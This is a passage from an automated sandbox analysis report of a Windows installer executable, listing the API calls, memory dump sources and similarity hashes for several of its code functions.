                                                                                              • SetBkMode.GDI32(?,?), ref: 00404074
                                                                                              • GetSysColor.USER32(?), ref: 00404087
                                                                                              • SetBkColor.GDI32(?,?), ref: 00404097
                                                                                              • DeleteObject.GDI32(?), ref: 004040B1
                                                                                              • CreateBrushIndirect.GDI32(?), ref: 004040BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                              • Instruction ID: 7833da122bd5b54dba07469e608d39c2309fd7833842469cb0c606e819627665
                                                                                              • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                              • Instruction Fuzzy Hash: 5A2184B19047449BCB319F68DD08B5B7BF8AF40714F048A29EA95F22E0C738E904CB65
                                                                                              APIs
                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                • Part of subcall function 00405A66: ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031B1,00000000,00000000,00402FF1,000000FF,00000004,00000000,00000000,00000000), ref: 00405A7A
                                                                                                • Part of subcall function 00405CBE: wsprintfW.USER32 ref: 00405CCB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                              • String ID: 9
                                                                                              • API String ID: 1149667376-2366072709
                                                                                              • Opcode ID: 7d41bcd3dae3dae80b68e9040ec7ff24257b7140080f1b6cb91404220a5539cb
                                                                                              • Instruction ID: a762cbfc482fee2f38ad097521ed942063d68533c50e5d13a1d21fd8ed512a93
                                                                                              • Opcode Fuzzy Hash: 7d41bcd3dae3dae80b68e9040ec7ff24257b7140080f1b6cb91404220a5539cb
                                                                                              • Instruction Fuzzy Hash: 2E51E671E04209ABDF24DF94DE88AAEB779FF14304F50443BE501B62D0D7B99A42CB69
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3294113728-0
                                                                                              • Opcode ID: 09ec96b44468b6559568886edfe2b22b6abacdf6cac7a22eaf78803dc8c7711a
                                                                                              • Instruction ID: 39eb73ea935b4093d5e0ae2fe9f4df3abe493bf7cf7ddc07517dddc298ecdb3a
                                                                                              • Opcode Fuzzy Hash: 09ec96b44468b6559568886edfe2b22b6abacdf6cac7a22eaf78803dc8c7711a
                                                                                              • Instruction Fuzzy Hash: 0531C272C00118BBDF11AFA5CE49DAF7E79EF08368F24423AF510762D0C6795E418BA9
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404906
                                                                                              • GetMessagePos.USER32 ref: 0040490E
                                                                                              • ScreenToClient.USER32(?,?), ref: 00404928
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040493A
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404960
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                              • Instruction ID: 5094cac0cfd66b0e8cfd3256396541bb223221662a15d93018ee399e52c78ab9
                                                                                              • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                              • Instruction Fuzzy Hash: B9014071D00219BADB00DBA4DD45FFFBBB8AB95B21F10016ABB10B71C0C7B4A5018B95
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                              • MulDiv.KERNEL32(000F568E,00000064,000F5692), ref: 00402CC8
                                                                                              • wsprintfW.USER32 ref: 00402CD8
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402CE8
                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CFA
                                                                                              Strings
                                                                                              • verifying installer: %d%%, xrefs: 00402CD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: verifying installer: %d%%
                                                                                              • API String ID: 1451636040-82062127
                                                                                              • Opcode ID: 4a7d612a3107a8faa67c2a3ba57bc865a53d9af2ae63cae8aa971940a760aa5f
                                                                                              • Instruction ID: 00b8461607dcb0b3980451466b6828af2013657049940e2aaaac4a967361d4db
                                                                                              • Opcode Fuzzy Hash: 4a7d612a3107a8faa67c2a3ba57bc865a53d9af2ae63cae8aa971940a760aa5f
                                                                                              • Instruction Fuzzy Hash: F5012170604208BBEF249F60DD49BAE3B69FB00305F008039FA06A52D1DBB99954DB59
                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00401D44
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                              • CreateFontIndirectW.GDI32(0040BD58), ref: 00401DBC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                              • String ID: Tahoma
                                                                                              • API String ID: 3808545654-3580928618
                                                                                              • Opcode ID: 86243b7d43fd1254334335eab61183055d5a94c6c62a8693a7ecd88f836f01fe
                                                                                              • Instruction ID: 50cd7c3d9b324c63c10bedbdfe153cfa446442d7209eb1202fb80f546c31283e
                                                                                              • Opcode Fuzzy Hash: 86243b7d43fd1254334335eab61183055d5a94c6c62a8693a7ecd88f836f01fe
                                                                                              • Instruction Fuzzy Hash: D3016D71944280AFEB116BB0AE0AB9ABF74DF55301F14847AF141B62F2C7791005DBAE
                                                                                              APIs
                                                                                              • wsprintfW.USER32 ref: 100024E1
                                                                                              • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
                                                                                                • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,74DEFFC0,100011AA,?,00000000), ref: 1000131E
                                                                                              • GlobalFree.KERNEL32(?), ref: 10002559
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2062996466.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2062980489.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063018747.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063039760.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2435812281-0
                                                                                              • Opcode ID: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                              • Instruction ID: b8df5bf25714b619238b14e922296a4c8fadfdd3343c634a81266bb1cff10f5b
                                                                                              • Opcode Fuzzy Hash: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                              • Instruction Fuzzy Hash: 3131F1B1504A1AEFFB21CFA4DCA482AB7B8FF003D67224519F9419217CDB319D50DB69
                                                                                              APIs
                                                                                                • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                              • GlobalFree.KERNEL32(?), ref: 10001928
                                                                                              • GlobalFree.KERNEL32(?), ref: 10001AB9
                                                                                              • GlobalFree.KERNEL32(?), ref: 10001ABE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2062996466.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2062980489.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063018747.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063039760.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeGlobal$lstrcpy
                                                                                              • String ID:
                                                                                              • API String ID: 176019282-0
                                                                                              • Opcode ID: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                              • Instruction ID: 5f977143e903dceeb219282147683d12af406f102b63ffa8563e92424d473d54
                                                                                              • Opcode Fuzzy Hash: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                              • Instruction Fuzzy Hash: B451B736F01119DAFF10DFA488815EDB7F5FB463D0B228169E804A311CDB75AF419B92
                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                                                                                              • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 1000165A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2062996466.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2062980489.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063018747.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063039760.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                              • String ID:
                                                                                              • API String ID: 1148316912-0
                                                                                              • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                              • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                              • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                              • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
